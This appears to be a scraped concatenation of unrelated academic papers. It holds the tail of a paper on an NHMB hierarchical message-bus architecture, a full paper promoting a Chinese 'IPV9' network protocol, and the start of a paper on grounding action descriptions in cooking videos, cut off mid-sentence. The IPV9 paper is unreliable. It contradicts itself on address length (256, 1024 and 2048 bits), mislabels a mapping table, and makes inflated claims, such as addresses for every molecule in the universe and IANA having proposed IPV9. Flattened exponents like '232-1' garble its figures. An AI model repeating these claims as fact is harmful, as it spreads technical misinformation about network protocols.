(NHMB, New Hierarchical Message Bus), as shown in Figure 4 below. Compared with the traditional HMB architecture, the NHMB architecture adds non-standard components of interface-message modem and message-message modem and message interface. Among them, the message-message modem (MMM), a non-standard International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 20 component based on the message interconnection interface, uses MMM middleware to send and receive and parse messages between the component and the message bus. The interface-message modem (IMM) calls the non-standard components of the interface and uses IMM middleware to complete the conversion and transmission between the interface and the message. Complex components in the system can be decomposed into relatively low-level subcomponents, which are connected through a local message bus [7]. Such complex components are called composite components. If the sub-components are still relatively complex, they can be further decomposed, and the decomposition continues in this way, and the entire system forms a tree-like topology. The end nodes of the tree structure are called leaf nodes. They are atomic components in the system and no longer contain subcomponents. The entire system can be used as a component to integrate into a larger system through a higher-level message bus. Therefore, the entire system and the individual components that make up the system can be characterized in a unified manner. The improved NHMB architecture model in this paper is similar to the HMB structure, which has three parts: interface, static structure and dynamic behavior. Interface: The interface in NHMB can be either the originally supported interface with message interaction function or an interface that only provides formal calls. Static structure: The composite components in NHMB are also based on NHMB's architectural style, not the original HMB's architectural style. Based on the above two changes, the architecture can greatly reduce the requirements for the specificity of components, so that existing components can be reused to a greater extent. 1) Component model: The improved NHMB architecture in this paper is similar to the HMB architecture, which has three parts: interface, static structure and dynamic behavior. Action Interface Structure Internal Message External Message Hierarchical Message Bus (Connector) Modem Component Component Non-Standard Message Non-Standard Component Figure 5. Component model of NHMB architecture 2) Component interface: The NHMB architecture achieves the indirect use of such components by adding an interface-message modem or a message-message modem between the type of component and the message bus. From the overall system perspective, although a module is added to the system, it has no effect on other modules of the system. In addition, there is no need to modify the message bus. In a sense, the NHMB architecture can achieve the effect of supporting more types of components by adding corresponding middleware modules, thereby greatly improving the system development efficiency and system stability. 3) Modem middleware: In order to support non-standard components, this article adds interface-message modem or message-message modem middleware to complete the reception and analysis of messages in the system in the NHMB architecture. So as to better adapt to the development of software systems, and greatly reduce the complexity of software system development, maintaining the stability of the system. The working principle of the modem is shown in Figure 6 below. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 21 Message Bus (Connector) Component_A Component_B Component_Interface Message-Message Modem Interface-Message Modem Ms g_A1 Ms g_B1 Msg_A1 Ms g_B1Ms g_A2 Ms g_A2 Msg_B2 Ms g_B2 Ms g_I1Ms g_I2 Ms g_I2 Ms g_I1 Figure 6. Message modem middleware Component A, Component B, and Interface component send messages to the message bus together. Component A and Component B are standard components. Component Interface is an interface component. Two different types of components first send their own characteristic messages Msg_A1, Msg_B1, Msg_I1 to MMM and IMMM, then MMM and IMMM parse the message Msg_A1, Msg_B1, Msg_I1 from the component according to the rules prescribed in advance with the standard component and interface component, and then repackage the message into Msg_A2 according to the format that the message bus can handle. Msg_B2, Msg_I2, and forwarded to the corresponding message bus, so as to achieve indirect communication between component A, component B and interface component Interface to the message bus, the process of returning messages is similar to the process of sending messages. 4) Structural characteristics of NHMB system: High robustness: The message-message modem/interface modem added in this paper has a strong resolution and modulation mechanism, and has strong fault handling and recovery capabilities for non-standard components based on the message interconnect interface. Higher development efficiency: the system can use mature functional components, even if its interface does not meet the needs of the system, it can be easily integrated into the system by adding a simple modem. Support the distributed operation of each functional module: since all components in the system interact through the message bus, the system can pass the messages of each module to each other without affecting the distributed concurrent operation. More secure: The NHMB architecture designed in this paper introduces a modem. In order to increase the security of the system and prevent the communication of the message bus from being maliciously destroyed, authentication and encryption are adopted in the NHMB architecture style to ensure the security of message transmission. The introduction of modem not only reduces the requirements for components, increases the range of component selection, improves the scalability of the system, but also provides a convenient way for the system to expand the security mechanism, that is, the modem developed at this time not only contains message interface matching It also provides special functions for encryption and decryption. Easy to expand and maintain: Each component in the system is independent of each other, so when expanding or modifying system functions, you can only operate the specific modules in it, without affecting other modules. IV. CONCLUSION The NHMB architecture proposed in this paper has the advantages of high robustness, higher system development efficiency, easy expansion and easy maintenance. By adding two intermediate components of message-message modem and interface-message modem on the basis of the traditional HMB architecture The operation greatly reduces the complexity of software system development, maintains the stability of the system, and solves the problem that components with good functions cannot be used because of different interfaces, and the same functional components and HMB system that meet the interface standards need to be redeveloped The structure has too strict requirements on the components constituting the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 22 system, and lacks reuse support for components that fail to provide corresponding interfaces. REFERENCES [1] Zhang Yousheng. The third article of software architecture series-style of software architecture [J]. Programmer, 2002(08): 45-47. [2] Zhang Shikun, Wang Lifu, Chang Xin, Yang Fuqing. Software Architecture Description Language Based on Hierarchical Message Bus [J]. Chinese Journal of Electronics, 2001(05): 581-584. [3] Zhang Shikun, Wang Lifu, Yang Fuqing. Software architecture style based on hierarchical message bus [J]. Chinese Science Series E: Technology Science, 2002(03):393-400. [4] Zhang Yousheng, software architecture [M]. Version 2. Beijing: Tsinghua University Press, 2006. [5] Zhang Shikun, Wang Lifu, Chang Xin, Yang Fuqing. Software Architecture Description Language Based on Hierarchical Message Bus [J]. Acta Electronica Sinica, 2001(05):581-584. [6] Yang Fuqing, Mei Hong, Li Keqin.Software reuse and software component technology [J]. Journal of Electronics, 1999(02):69-76+52. [7] Qin Guorong, Zhang Shikun. Research on Dynamic Simulation and Evolution of Software Architecture Based on Hierarchical Message Bus [J]. Computer Science, 2001(03):75-77. [8] Wang You, Rong Mei, Zhang Guangquan. Application system model based on hierarchical message [J]. Computer Science, 2006(11): 285-288+292. work_upougi7rh5cjzkyqdpt77pgsya ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-016 47 Research and Implementation of Future Network IPV9 Liu Zhang 1. School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China 2. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control Xi'an, China E-mail: 604463203@qq.com Wang Yubian Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street, Gomel, 246653 Republic of Belarus E-mail: alika_wang@mail.ru Abstract—Nowadays, IPv4 has been difficult to meet the needs of the Internet in terms of performance, address space, security, etc. In order to solve the relevant needs of IPv4, protocols such as IPv6 and IPV9 have been born. This article introduces the current status and characteristics of IPv4 and IPv6, compares with IPV9, summarizes the relevant characteristics of IPV9, and introduces the production process of IPV9, its protocol composition, system architecture and related application introduction. IPV9 is controlled by my Chinese core technology and has independent intellectual property rights, which is the foundation of my country's future network. Keywords-Future Network; Decimal System; IPV9 I. IP A. The Introduction of IP IP(Internet Protocol), is the network layer Protocol in the TCP/IP architecture. When we use the Internet, the most important question is whether my messages and actions can be successfully sent and whether I can receive messages from the outside. Today, our needs are fundamentally assured through IP. Sending and receiving is actually a kind of information transmission, our various operations will be various applications in the form of packets for transmission. The problem is getting from the beginning to the end, and it's not a direct highway, but a ladder of different routes that takes multiple hops to get there. The purpose of IP is to solve the problems of network connection and computer communication. Each IP address consists of a network address (NetID) and a host address (HostID). A network address represents which network in the Internet it belongs to, and a host address represents which host in that network it belongs to. B. The Introduction of IP Address IP Address(Internet Protocol Address), is a unified address format that assigns a logical address to each network and host on the Internet, just like our mobile phone number, which can be used to mask the physical address differences while making communication more convenient. All IP addresses consist of network ID and host ID. Depending on the network ID and host ID, the Internet commission has defined five IP address types to suit networks of different capacities, namely class A to class E. Among them, A, B and C are the basic classes, while D and E are used as multicast and reserved. This is shown in figure 1. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 48 Figure 1. IP address II. THE FEATURES AND PROBLEMS OF IPV4 AND IPV6 A. The Present Situation of IPv4 IPv4 has played a key role in the development of networks, but with the expanding of network size, it can not meet the demand of network development, the first is the address resources are exhausted, lead directly to address the crisis, although no classification of addressing CIDR technology, network address translation NAT technology to alleviate the crisis, but still can't solve the problem. The second problem is the expansion of routing table. The topology structure of address space directly leads to the fact that the form of address allocation is irrelevant to the network topology. With the growth of the number of networks and routers, the over-expansion of routing table increases the cost of searching and storage and becomes the bottleneck of the Internet. At the same time, the length of packet head is not fixed, so it is very inconvenient to extract, analyze and select the route by hardware, so it is difficult to improve the throughput rate of route data. Then there is the uneven distribution of IP addresses, because of the origin of the United States, more than half of all addresses are owned by the United States, resulting in a serious imbalance in the distribution of IP addresses. There is also a lack of QoS (Quality of Service) support. IPv4 did not want to be open to the public at the beginning of the design, so it is very lacking in security, and it is difficult to provide rich QoS functions for real-time multimedia, mobile IP and other commercial services, although later The developed protocols such as RSVP provide QoS support, but the cost of planning and constructing an IP network is relatively high. B. The Features and Problems of IPv6 IPv4 is a widely deployed Internet protocol. The IPv4 protocol is simple, easy to implement and interoperable. However, with the rapid development of the Internet, the deficiencies of IPv4 design have become increasingly obvious. IPv4 address space is insufficient, and the number of routing table entries that need to be maintained is too large. To solve these problems, the IETF designed IPv6. Compared with IPv4, IPv6 has the following features：  IPv6 has a larger address space. In IPv4, the length of the IP address is 32 bits, that is, there International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 49 are 2^32-1 addresses; In IPv6, the length of an IP address is 128 bits, or 2^128-1 addresses. Compared with the 32-bit address space, the address space is greatly increased.  IPv6 uses smaller routing tables. IPv6 address assignment follows the principle of Aggregation at the beginning, which enables the router to represent a subnet with an Entry in the routing table, greatly reducing the length of routing table in the router, and improving the router's forwarding speed of packets.  IPv6 adds enhanced Multicast support and Flow Control, which allows for the development of multimedia applications on the network and provides a good network platform for QoS Control.  IPv6 adds support for Auto Configuration. This is the improvement and extension of DHCP protocol, making network management more convenient and fast.  IPv6 has Better header formatting, it uses a new header format with options that are separated from the base header and can be inserted between the base header and the upper data if desired. This simplifies and speeds up the routing process because most options do not need to be routed. Despite the obvious advantages of IPv6, the number of IPv4 routers is huge, and the transition from IPv4 to IPv6 is a gradual process, with IPv6 being backward compatible. Therefore, IPv6 and IPv4 will coexist for a long time to come. In addition, IPv6 has a big flaw in the design idea of its address structure. IPv6 confuses the network hierarchy in design. The interface ID embeds the physical address into the logical address layer, which on the one hand leads to the limitation of the physical address space to the empty IP address. Security does not belong to the content of the IP layer, so it is inappropriate to design security technology in the IP layer. Because with the development of security technology, security methods and key length will constantly change, so the development of security technology will eventually lead to the requirements of IP address redesign. Due to the chaotic logic of the network hierarchy, IPv6 creates far more new problems than it solves. III. THE INTRODUCTION OF IPV9 A. The Production of IPV9 In 1998, Chinese researcher Xie Jianping proposed IPV9, which means "Method of using whole digital code to assign address for computer." IPV9 is a "nickname" borrowed from the American concept of IP. In order to distinguish China's IPV9 from America's IPv4 and IPv6, the V in China's IPV9 is uppercase, not lowercase. The patent covers the new address coding design, the new addressing mechanism and new address three technical architecture design, form a new system of IP network at the bottom of the core technology, on the basis of the design of the new framework, to form a network system that is connected and compatible to cover the existing network (the Internet using IPv4 and IPv6 technologies). In 2011, the authoritative professional agencies of the us government confirmed legally and technically that China owns the core technologies of the sovereign network under the IP framework, which are different from the existing technologies of the us Internet and have independent intellectual property rights. This is the IPV9 patented technology, the official name of the patent is "the method of assigning addresses to computers in full numeric code." China's IPV9 was approved in 2001 (CN98 1 22785), and has been granted patents in more than 10 countries and regions including South Africa, Turkey, kazakhstan, Russia, the republic of Korea, the democratic People's Republic of Korea, Hong Kong, Canada, Singapore, Australia, Mexico and Norway. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 50 In 2004, IPV9 applied for the us patent, which was successively issued by the us Patent Office seven times with "non-final rejection opinions" and six times with final rejection letters. During this period, IT was repeatedly criticized by senior members of the US IETF and famous IT companies in the US. In December 2011, The United States Patent and Trademark Office (PTO) officially issued the patent certificate No. and US 8,082,365, and stated in its notification of approval that the applicant's verification report was "very convincing". IPV9 protocol refers to the 0-9 Arabic digital network as virtual IP address, and the decimal system as the text of the representation method, that is, a convenient way to find the use of the Internet users; For efficiency and end-user convenience, some of the addresses can be used as domain directly; It has an infinite number of allocatable IP addresses, with a maximum of 2 by 2048 bits, and is the cornerstone of the future digital world. At the same time, due to the use of the original computer network, cable broadcast television network and telecommunications network business classification code, therefore, also known as the "new generation of secure and reliable information integrated network protocol." B. The Characteristics of IPV9 Compared with IPv4 and IPv6, IPV9 has more obvious features and advantages, mainly reflected in the following points: 1) Address space is huge IPV9 has a larger address space than IPv4/IPv6. IPv4 defines the bit length of IP address is 32, that is, there are 232-1 addresses; While the length of IPv6 is 128, that is, 2128-1 addresses, the standard length of an IPV9 address is 2256-1, with 42 layers address structure design will be 10256-1 (21024-1). To put it mildly, if IPv6 were widely used, every grain of sand in the world would have an IP address. Then after IPV9 is widely used, the smallest molecule of bright matter in the whole universe will have a corresponding address. It is no exaggeration to say that if IPV9 is fully applied, every cell and living gene in the world can be assigned to an IPV9 address. Layer 42 is the asset management address (including legal digital currency space) compatible with ean-ucc128 barcode length. 2) Route tables are smaller IPv6 has a smaller routing table than IPv4. The address allocation of IPv6 follows the principle of Aggregation at the beginning, which enables the router to represent a subnet with an Entry in the table, this greatly reducing the length of routing table in the router, and improving the speed of forwarding packets in the routing table. The routing table of IPV9 is very small, and the address allocation of IPV9 follows the principle of Geo-spatial clustering from the beginning, which enables IPV9 router to represent a country subnet and an application subnet with a single record, it greatly reducing the length and cleanliness of routing table in the router, and improving the speed of forwarding packets by routing table. At the same time, this subnet can express a specific geographical location, for example, we assign the IPV9 address segment of Shanghai as 86[21[5]/96, then in other routers of the same level, only one route pointing to the address segment of 86[21[5]/96 can realize the IPv9 address routing of Shanghai. According to this logic, only one route is needed from country to country. For example, the route to China is 86/64. The IPv4 routing table is large and irregular, and the IPv6 routing table is smaller than IPv4, but the IPv6 routing table contains no geographic information and the routing is messy. 3) Automatic configuration support IPV9 adds support for automatic configuration of variable length addresses, which is an improvement and extension of DHCP protocol of IPV9, making network management more convenient. IPV9 supports multicast, and supports the ISO/IEC C6 future network << naming and addressing >>TCP/IP/M model, and International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 51 supports long packet code streams for virtual and real circuits. This allows multimedia applications on the web to ensure video quality and reduce overhead, provide faster and faster applications such as industrial controls and unmanned vehicles, and provide better and cheaper service over the Internet than IPv6. 4) Address length could be select IPV9 address length has a variety of options, which can realize the change of 16, 32, 64, 128, 256, 512 and 1024 bit address length, and select the most appropriate address length according to different usage scenarios to reduce the routing overhead. 5) Dual encryption The address length of IPV9 is long enough to realize dual encryption from the transmission of source and target addresses, which plays an important role in some specific network transmission fields. IPV9 network makes use of logical isolation features to make network information transmission more secure and effective. 6) Add location information to the address IPV9 addresses can be embedded with geo-location information, as well as personal and industry ID information, this making IP addresses uniquely tied to personal information. 7) Compatible with previous addresses IPV9 address is backward compatible with IPv4/IPv6 address. In order to absorb the upgrade difficulty of IPv6 incompatibility with IPv4, IPV9 protocol remains and unchanged, so that IPv4/IPv6 upgrade to the new version of IPV9, the upgrade cost is very low. 8) Sovereignty is different IPv4/IPv6 addresses Spaces and copyright ownership: United States. IPV9 address space and copyright ownership: China. IPV9 has its own intellectual property rights and was proposed by The Internet Assigned Numbers Authority (IANA), but it is China that has succeeded in developing and mastering the core technology. Compared with IPv4/v6, China has the core patent digital domain system of IPV9 technology, which is of great significance for the future development of China's network and the mastery of the security of cyberspace. C. The Construction of IPV9 Protocol The IPV9 protocol includes message protocol, address protocol, transition protocol, mobile communication protocol, etc, as shown in figure 2. Figure 2. IPV9 protocol 1) Address Protocol The IPV9 network expands the number of address bits to 256 bits, realizing a huge addressing space. And according to different data transmission methods, IPV9 addresses are divided into three types: unicast, anycast and multicast. In summary, it is the difference between one-to-one, one-to-one recent and one-to-many. Unicast type Each interface is configured with an identifier, and the packet identifies the identifier to reach the specified interface; an identifier in any on-demand type represents a group of interfaces of different nodes, and the shortest path interface is selected through a routing protocol And transmit the data packet to the interface; multicast is to use the multicast address to send the data packet to each International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 52 interface indicated by the identifier, and the shortest path interface will not be selected. IPV9 uses the "decimalization and brackets" approach in two forms: a) Use the complete brackets to represent 2048 bits. In this way, the brackets can be ignored when entering a web address in the browser's address bar. b) Divide the 256-bit address into 8 segments, each segment being 32 bits, "a [b] [c] [d] [e] [f] g [h". IPV9 addresses are very compatible with IPv4 and IPv6. The mapping relationship is shown in table 1 and table 2. The addresses of IPv4 and IPv6 are kept intact in the last bit address segment, and the value of the first address is used as an identifier to point to IPv4 or IPv6. TABLE I. MAPPING RELATIONSHIP FROM IPV4 TO IPV9 Address number 1-96 97-128 129-160 161-256 Length (bits)） 96 32 96 32 Mapping 0[0[0 0 0 IPv4 address TABLE II. MAPPING RELATIONSHIP FROM IPV4 TO IPV9 Address number 1-96 97-192 193-256 Length (bits)） 96 32 96 Mapping 1[0[0 0 IPv6 address For IPV9 nodes in tunneling technology, they need to be assigned IPv4/IPv6 compatible addresses to communicate with other nodes in the corresponding network. The mapping strategy for this situation is shown in table 3, where the first prefix is 1000000000, the 000 and 001 values in the token bit correspond to IPv4 and IPv6 respectively, and the rest are reserved for future function expansion. TABLE III. IPV9 COMPATIBILITY WITH IPV4/IPV6 Address number 1-10 11-29 30-32 33-96 97-128 129-214 215-256 Length (bits)） 10 19 3 64 32 96 32 Content prefix keep mark 0 scope IPv6 IPv4 address 2) Message Protocol TABLE IV. IPV9 MESSAGE PROTOCOL Version number Traffic Flow Type Flow Label Address length Priority traffic class Address authentication Absolute Traffic Payload Length Next Header Limit jump times Source Address（256bit） Destination Address（256bit） Time Identification Code International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 53 The total header length of IPV9 is 72 bytes, which is more than that of IPv4 but more concise. The format is shown in table 4, which consists of ten parts: protocol version number, communication flow type, payload length, stream label, next header, hop limit, source address, destination address, time, identification code, etc. In IPV9, the optional information of other layers is placed in the extended header between the high-level protocol header and the IPV9 header, and its structure is shown in table 5. An IPV9 packet can carry one or more or even no extension headers, and each subsequent extension header location is marked in its previous header. TABLE V. EXTENSION HEADERS IPV9 header Next header=TCP TCP header + data IPV9 header Next header=route IPV9 header Next header=TCP TCP header + data IPV9 header Next header=route IPV9 header Next header=data segment IPV9 header Next header=TCP TCP data segment Header + data 3) Transition Protocol The IPV9 transition protocol specifies the IPV9 transition header format and the definition of the address text representation, addressing model, and node address, including a detailed description of the currently defined transition header and address format. The header in the transition period uses the original IPv4 header, and only changes the version number to 9 to distinguish it from the original IPv4 header. The last two segments of the IPV9 address are adopted for the interim address, which is 64 bits in total. D. The System Architecture of IPV9 IPV9/Future Network root domain name server system, consisting of a parent root server, a master root server, 13 equal-name root domain name servers named by 13 English N-Z, Top-level domain name servers of 239 countries and regions like .CHN,.USA,.HKG,.MAC, routing management systems, application servers and 10 Gigabit backbone routers. Its working principle is that 13 root domain name servers read the main root server first, then read the parent root server, and after obtaining the data, they will spread to the whole network. Only 13 root domain name servers can access this hidden distribution host. This hidden publishing host is maintained. 13 root domain name servers read its data, which is read by the mirror server, and then spread to the entire network. The IPV9 root domain name server system is shown in Figure 3. The root name server is the highest-level domain name server in the Internet domain name system (DNS). It is mainly used to manage the Internet's home directory, and is responsible for providing authorized domain name server addresses for Top Level Domain TLD resolution. It is the necessary infrastructure for constructing the Internet. Many computer scientists refer to the root domain name server as "truth", which shows its importance. Currently, the Internet's root domain name server, gTLD, and ccTLD are all managed and controlled by ICANN (Internet Corporation for Assigned Names and Numbers) authorized by the US government. Attacking the root domain name server is the most direct and deadly method of attacking the Internet. In the existing Internet, the root server is completely controlled by the United States, which poses a great risk to other International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 54 countries. The 13 IPV9 root DNS that can adapt to IPv4 networks, IPv6 networks, and IPV9 networks, use decimal network technology to organize, build, secure, controllable, face global users, and serve Chinese, English, digital and other languages , And can provide personalized broadband multimedia communication services on the communication network to provide English, digital, Chinese domain name resolution function. The IPV9 resolution system can ensure that the domain used by online users are resolved by the domain server to obtain the IP address of the corresponding access object, which is compatible with the current various domain services. Figure 3. The System of IPV9 Root Name Server International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 55 This 13 root domain name resolution systems based on IPV9, able to adapt to IPv4 network, IPv6 network, IPV9 network, through the organization and construction of decimal network technology, with a safe and controllable appearance for global users, and can provide services and personality in various languages Provide broadband, multimedia communication service communication network to provide English, digital, Chinese domain name resolution function. The IPV9 resolution system can ensure that the domain names used by online users are resolved by the domain name server to obtain the IP address of the corresponding access object, and can also send requests for non-numeric domain names to the corresponding English domain name server or Chinese domain name server, as well as various Language domain name servers, while providing digital domain name resolution functions, are also compatible with providing Chinese and English domain name resolution services. E. The Architecture Design of IPV9 The conventional data packet exchange of the current TCP / IP protocol cannot support true real-time applications and circuit switching, and the application of circuit transmission of sound or images in the four-layer protocol. In addition, the existing TCP / IP protocol is a connectionless and unreliable data packet protocol with a maximum packet length of 1514 bytes. With the integration of voice, image and data, the establishment of a new network theoretical foundation has become an urgent task. The design purpose of IPV9 is to avoid large-scale changes of the existing IP protocol, leading to the next-generation Internet can be backward compatible. The main idea of the design is to merge the IP protocol of TCP/IP with circuit switching. Using a router compatible with the two protocols, the designer envisions that through a series of protocols, the addresses of the three protocols (Ipv4/Ipv6/IpV9) Simultaneous use in the Internet, gradually replacing the current Internet structure without excessively affecting the current Internet. Due to the rational design of IPV9, it has received the attention of ISO and the International Internet Association. 1) The level system of IPV9 The IPV9 system uses a three-layer circuit / four-layer packet hybrid network architecture, and adopts the communication network transmission mode of authentication before communication rules. It was first proposed by China and has formed a demonstration project. The architecture is shown in Figure 4. Figure 4. The level system of IPV9 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 56 2) The Connection of IPV9 IPV9's TCP / IP / M protocol, in addition to inheriting the existing TCP / IP protocol connectionless and unreliable data packet protocol, also develops absolute code streams and long stream code classes. Long packets can reach more than tens of megabytes. Can use three layers to directly transmit telephone and cable TV data to establish a four-layer three-layer transmission protocol with the new transmission theory. The connection method is shown in Figure 5. Figure 5. The Connection of IPV9 The IPV9 network management system is a comprehensive network management system that provides network monitoring and other functions based on a web interface. It can monitor various network parameters and server parameters to ensure the safe operation of the server system; it also supports IPV4 and IPV9 protocols, and provides a flexible notification mechanism to allow system administrators to quickly locate and solve various problems. Through the use of IPV9 design routers, clients, protocol conversion routers and other equipment to build a pure IPV9 network, IPV9/IPv4 hybrid network to achieve a new generation of independent intellectual property security and control of the Internet system. Including the domestically-controlled and self-controllable IPV9/future network root domain name system, promoting technology integration, business integration, and data integration to achieve cross-layer, cross-region, cross-system, cross-department, and cross-business collaborative management and services. Take data centralization and sharing as a means to build a nationally integrated national big data center and gateway bureau, speed up the promotion of domestically made independent and controllable alternative plans, and build a safe and controllable information technology system. Be independent of the control of the US domain name system and realize an independent domain name system. F. The Application Examples of IPV9 1) The application of 5G-future network/IPV9 movie network release application Now the 5G network of China Unicom Beijing and China Mobile Suzhou have been directly connected through the IPV9 fiber routing backbone node of International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 57 Beijing University of Posts and Telecommunications and the IPV9 national backbone optical cable network, and achieved the world's first time End-to-end 500Mbps to 1000Mbps speed on May 21 this year. On the IPV9 national backbone network +5G local access/5G core network, the digital film program network distribution work was successfully carried out, and the national network distribution of Chinese movies was first entered in the new era of "one hour". 2) "Health Tai'an " IPV9 Big Data Platform "Health Tai'an "IPV9 big data platform project relies on the existing backbone optical cable and user transmission access network of Shandong Broadcast Network Co. Ltd. Tai'an Branch, using IPV9 network technology to upgrading and construction, cover the medical and health institutions of the city, county, township and village levels and the medical insurance bureau, the administrative department and the finance bureau of Tai'an, and further expand to families and individuals. The bandwidth meets the requirements of healthy Tai'an big data business and can be sustainable. The expansion realizes compatible security operation between IPV9 network and IPv4 network (also realizes logical security isolation between IPV9 and IPv4 and IPv6 networks). IV. CONCLUSION Nowadays, the lack of IP addresses has become the main reason restricting its development. IPV9 has a huge address capacity, and it is better than IPv6 in terms of security, compatibility, efficiency, and cost savings. It is more suitable in China Development. This article introduces the characteristics, production process, protocol and composition of IPV9. IPV9 is independently developed by Chinese and has independent intellectual property rights. At the same time, it can solve the remaining problems of IPv4 and can be the core key technology of the next generation Internet. The new network should not be an upgrade of the old network, but a new network system structure. If it can be promoted, it will definitely promote the great development of the Internet. REFERENCE [1] Information technology-FutureNetwork-Problem statement and requirement-Part 5: Security, ISO/IEC DTR 29181-5, 2014, 12. [2] HeYudan, Zhu Lian, etc. Commercial radio-frequency identification tag data format. SB/T 10530-2009, 2010, 03. [3] Xie Jianping, Kong Ning, Etc. Domain name specification based on RFID Technology used for products and service. SJ/T11605-2016, 2016, 06. [4] Wang Wenfeng, Xie Jianping, etc. Product and service digital identification format for information procession.SJ/T11603-2016, 2016.06. [5] Xie Jianping etc. Digital domain name specification, SJ/T11271-2002, 2002.07. [6] Xie Jianpingetc. A method of assigning addresses to network computers using the full decimal algorithm[P]. CN: ZL00135182.6, 2004.2.6. [7] Tang Xiaodan etc. Computer Operating System (third edition) [M]. Xi’an: Xidian university press, 2010 [8] Xie Jianping, Xu Dongmei, etc. Digital domain name specification.SJ/T11271-2002, 2002.07. work_urkrgneoazdutdue3pq3atzeaq ---- Transactions of the Association for Computational Linguistics, 1 (2013) 25–36. Action Editor: Hal Daumé III. Submitted 10/2012; Published 3/2013. c©2013 Association for Computational Linguistics. Grounding Action Descriptions in Videos Michaela Regneri ∗, Marcus Rohrbach �, Dominikus Wetzel ∗, Stefan Thater ∗, Bernt Schiele � and Manfred Pinkal ∗ ∗ Department of Computational Linguistics, Saarland University, Saarbrücken, Germany (regneri|dwetzel|stth|pinkal)@coli.uni-saarland.de � Max Planck Institute for Informatics, Saarbrücken, Germany (rohrbach|schiele)@mpi-inf.mpg.de Abstract Recent work has shown that the integration of visual information into text-based models can substantially improve model predictions, but so far only visual information extracted from static images has been used. In this paper, we consider the problem of grounding sentences describing actions in visual information ex- tracted from videos. We present a general purpose corpus that aligns high quality videos with multiple natural language descriptions of the actions portrayed in the videos, together with an annotation of how similar the action descriptions are to each other. Experimental results demonstrate that a text-based model of similarity between actions improves substan- tially when combined with visual information from videos depicting the described actions. 1 Introduction The estimation of semantic similarity between words and phrases is a basic task in computational semantics. Vector-space models of meaning are one standard approach. Following the distributional hy- pothesis, frequencies of context words are recorded in vectors, and semantic similarity is computed as a proximity measure in the underlying vector space. Such distributional models are attractive because they are conceptually simple, easy to implement and relevant for various NLP tasks (Turney and Pan- tel, 2010). At the same time, they provide a sub- stantially incomplete picture of word meaning, since they ignore the relation between language and extra- linguistic information, which is constitutive for lin- guistic meaning. In the last few years, a growing amount of work has been devoted to the task of grounding meaning in visual information, in par- ticular by extending the distributional approach to jointly cover texts and images (Feng and Lapata, 2010; Bruni et al., 2011). As a clear result, visual information improves the quality of distributional models. Bruni et al. (2011) show that visual infor- mation drawn from images is particularly relevant for concrete common nouns and adjectives. A natural next step is to integrate visual infor- mation from videos into a semantic model of event and action verbs. Psychological studies have shown the connection between action semantics and videos (Glenberg, 2002; Howell et al., 2005), but to our knowledge, we are the first to provide a suitable data source and to implement such a model. The contribution of this paper is three-fold: • We present a multimodal corpus containing textual descriptions aligned with high-quality videos. Starting from the video corpus of Rohrbach et al. (2012b), which contains high- resolution video recordings of basic cooking tasks, we collected multiple textual descrip- tions of each video via Mechanical Turk. We also provide an accurate sentence-level align- ment of the descriptions with their respective videos. We expect the corpus to be a valu- able resource for computational semantics, and moreover helpful for a variety of purposes, in- cluding video understanding and generation of text from videos. • We provide a gold-standard dataset for the evaluation of similarity models for action verbs and phrases. The dataset has been designed as analogous to the Usage Similarity dataset of 25 Erk et al. (2009) and contains pairs of natural- language action descriptions plus their associ- ated video segments. Each of the pairs is an- notated with a similarity score based on several manual annotations. • We report an experiment on similarity model- ing of action descriptions based on the video corpus and the gold standard annotation, which demonstrates the impact of scene information from videos. Visual similarity models outper- form text-based models; the performance of combined models approaches the upper bound indicated by inter-annotator agreement. The paper is structured as follows: We first place ourselves in the landscape of related work (Sec. 2), then we introduce our corpus (Sec. 3). Sec. 4 re- ports our action similarity annotation experiment and Sec. 5 introduces the similarity measures we ap- ply to the annotated data. We outline the results of our evaluation in Sec. 6, and conclude the paper with a summary and directions for future work (Sec. 7). 2 Related Work A large multimodal resource combining language and visual information resulted from the ESP game (von Ahn and Dabbish, 2004). The dataset contains many images tagged with several one-word labels. The Microsoft Video Description Corpus (Chen and Dolan, 2011, MSVD) is a resource providing textual descriptions of videos. It consists of multiple crowd-sourced textual descriptions of short video snippets. The MSVD corpus is much larger than our corpus, but most of the videos are of relatively low quality and therefore too challenging for state-of- the-art video processing to extract relevant informa- tion. The videos are typically short and summarized with a single sentence. Our corpus contains coher- ent textual descriptions of longer video sequences, where each sentence is associated with a timeframe. Gupta et al. (2009) present another useful re- source: their model learns the alignment of predicate-argument structures with videos and uses the result for action recognition in videos. However, the corpus contains no natural language texts. The connection between natural language sen- tences and videos has so far been mostly explored by the computer vision community, where dif- ferent methods for improving action recognition by exploiting linguistic data have been proposed (Gupta and Mooney, 2010; Motwani and Mooney, 2012; Cour et al., 2008; Tzoukermann et al., 2011; Rohrbach et al., 2012b, among others). Our resource is intended to be used for action recognition as well, but in this paper, we focus on the inverse effect of visual data on language processing. Feng and Lapata (2010) were the first to enrich topic models for newspaper articles with visual in- formation, by incorporating features from article il- lustrations. They achieve better results when in- corporating the visual information, providing an en- riched model that pairs a single text with a picture. Bruni et al. (2011) used the ESP game data to cre- ate a visually grounded semantic model. Their re- sults outperform purely text-based models using vi- sual information from pictures for the task of mod- eling noun similarities. They model single words, and mostly visual features lead only to moderate im- provements, which might be due to the mixed qual- ity and random choice of the images. Dodge et al. (2012) recently investigated which words can actu- ally be grounded in images at all, producing an au- tomatic classifier for visual words. An interesting in-depth study by Mathe et al. (2008) automatically learnt the semantics of motion verbs as abstract features from videos. The study captures 4 actions with 8-10 videos for each of the actions, and would need a perfect object recognition from a visual classifier to scale up. Steyvers (2010) and later Silberer and Lapata (2012) present an 